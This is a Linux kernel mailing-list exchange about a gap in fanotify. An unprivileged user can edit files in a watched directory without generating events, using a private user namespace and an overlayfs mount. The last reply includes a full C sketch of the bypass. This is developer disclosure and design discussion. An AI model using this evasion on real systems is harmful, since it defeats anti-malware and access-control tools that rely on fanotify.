On Wed, May 12, 2021 at 03:34:15PM +0200, Jan Kara wrote:
> On Wed 12-05-21 15:07:05, Christian Brauner wrote:
> > On Mon, May 10, 2021 at 06:08:31PM +0300, Amir Goldstein wrote:
> > > > > > OK, so this feature would effectively allow sb-wide watching of events that
> > > > > > are generated from within the container (or its descendants). That sounds
> > > > > > useful. Just one question: If there's some part of a filesystem, that is
> > > > > > accessible by multiple containers (and thus multiple namespaces), or if
> > > > > > there's some change done to the filesystem say by container management SW,
> > > > > > then event for this change won't be visible inside the container (despite
> > > > > > that the fs change itself will be visible).
> > > > > >
> > > > > That is correct.
> > > > > FYI, a privileged user can already mount an overlayfs in order to indirectly
> > > > > open and write to a file.
> > > > >
> > > > > Because overlayfs opens the underlying file FMODE_NONOTIFY this will
> > > > > hide OPEN/ACCESS/MODIFY/CLOSE events also for inode/sb marks.
> > > > > Since 459c7c565ac3 ("ovl: unprivieged mounts"), so can unprivileged users.
> > > > >
> > > > > I wonder if that is a problem that we need to fix...
> > > > >
> > > > I assume you are speaking of the filesystem that is absorbing the changes?
> > > > AFAIU usually you are not supposed to access that filesystem alone but
> > > > always access it only through overlayfs and in that case you won't see the
> > > > problem?
> > > >
> > > >
> > > Yes I am talking about the "backend" store for overlayfs.
> > > Normally, that would be a subtree where changes are not expected
> > > except through overlayfs and indeed it is documented that:
> > > "If the underlying filesystem is changed, the behavior of the overlay
> > > is undefined, though it will not result in a crash or deadlock."
> > > Not reporting events falls well under "undefined".
> > >
> > > But that is not the problem.
> > > The problem is that if user A is watching a directory D for changes, then
> > > an adversary user B which has read/write access to D can:
> > > - Clone a userns wherein user B id is 0
> > > - Mount a private overlayfs instance using D as upperdir
> > > - Open file in D indirectly via private overlayfs and edit it
> > >
> > > So it does not require any special privileges to circumvent generating
> > > events. Unless I am missing something.
> > >
> > No, I think you're right. That should work. I don't think that's
> > necessarily a problem though. It's a bit unexpected and slightly
> > unpleasant but it's documented already and it's not a security issue
> > afaict.
>
> fanotify(7) is used in applications (such as virus scanners or anti-malware
> products) where they expect to see all filesystem changes. There are
> products which implement access mediation policy based on fanotify
> permission events. So a way for unprivileged application to escape
> notification is a "security" issue (not a kernel one but it defeats
> protections userspace implements).

Ah, good point. I assumed since this has always been the case although
restricted to privileged users on the host, i.e. creating an overlayfs
mount would always have that effect iiuc.
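
For reference, the three steps Amir lists could look roughly like the
sketch below. This is untested illustration only, not a reproducer taken
from this thread: the function names (write_str, ovl_opts,
edit_via_private_ovl) and all path parameters are made up here, and it
assumes a kernel that already contains 459c7c565ac3, a workdir on the same
filesystem as D, and an existing file `name` in D.

```c
#define _GNU_SOURCE
#include <fcntl.h>
#include <sched.h>
#include <stdio.h>
#include <string.h>
#include <sys/mount.h>
#include <sys/types.h>
#include <unistd.h>

/* Write a short string to an existing file; 0 on success, -1 on error. */
static int write_str(const char *path, const char *s)
{
	size_t len = strlen(s);
	ssize_t n;
	int fd = open(path, O_WRONLY);

	if (fd < 0)
		return -1;
	n = write(fd, s, len);
	close(fd);
	return n == (ssize_t)len ? 0 : -1;
}

/* Build the overlayfs option string; -1 if buf is too small. */
int ovl_opts(char *buf, size_t len, const char *lower,
	     const char *upper, const char *work)
{
	int n = snprintf(buf, len, "lowerdir=%s,upperdir=%s,workdir=%s",
			 lower, upper, work);

	return (n < 0 || (size_t)n >= len) ? -1 : 0;
}

/*
 * Hypothetical helper: append to `name` inside directory `d` through a
 * private overlayfs mounted on `merged`, with `d` as upperdir.
 * All directories must already exist. Returns 0 on success, -1 on error.
 */
int edit_via_private_ovl(const char *d, const char *lower, const char *work,
			 const char *merged, const char *name)
{
	char buf[4096], map[64];
	uid_t uid = getuid();	/* read ids before entering the new userns */
	gid_t gid = getgid();
	int fd, n;

	/* Step 1: new userns (plus mount ns) wherein the caller's id is 0. */
	if (unshare(CLONE_NEWUSER | CLONE_NEWNS) < 0)
		return -1;
	if (write_str("/proc/self/setgroups", "deny") < 0)
		return -1;
	snprintf(map, sizeof(map), "0 %u 1", (unsigned int)uid);
	if (write_str("/proc/self/uid_map", map) < 0)
		return -1;
	snprintf(map, sizeof(map), "0 %u 1", (unsigned int)gid);
	if (write_str("/proc/self/gid_map", map) < 0)
		return -1;

	/* Step 2: private overlayfs instance using D as upperdir. */
	if (ovl_opts(buf, sizeof(buf), lower, d, work) < 0)
		return -1;
	if (mount("overlay", merged, "overlay", 0, buf) < 0)
		return -1;

	/* Step 3: open the file in D indirectly via the overlay and edit it. */
	n = snprintf(buf, sizeof(buf), "%s/%s", merged, name);
	if (n < 0 || (size_t)n >= sizeof(buf))
		return -1;
	fd = open(buf, O_WRONLY | O_APPEND);
	if (fd < 0)
		return -1;
	if (write(fd, "x\n", 2) != 2) {
		close(fd);
		return -1;
	}
	return close(fd);
}
```

If Amir's analysis above is right, a watcher with a mark on D would not
get OPEN/MODIFY/CLOSE events for that write, since overlayfs opens the
underlying file with FMODE_NONOTIFY.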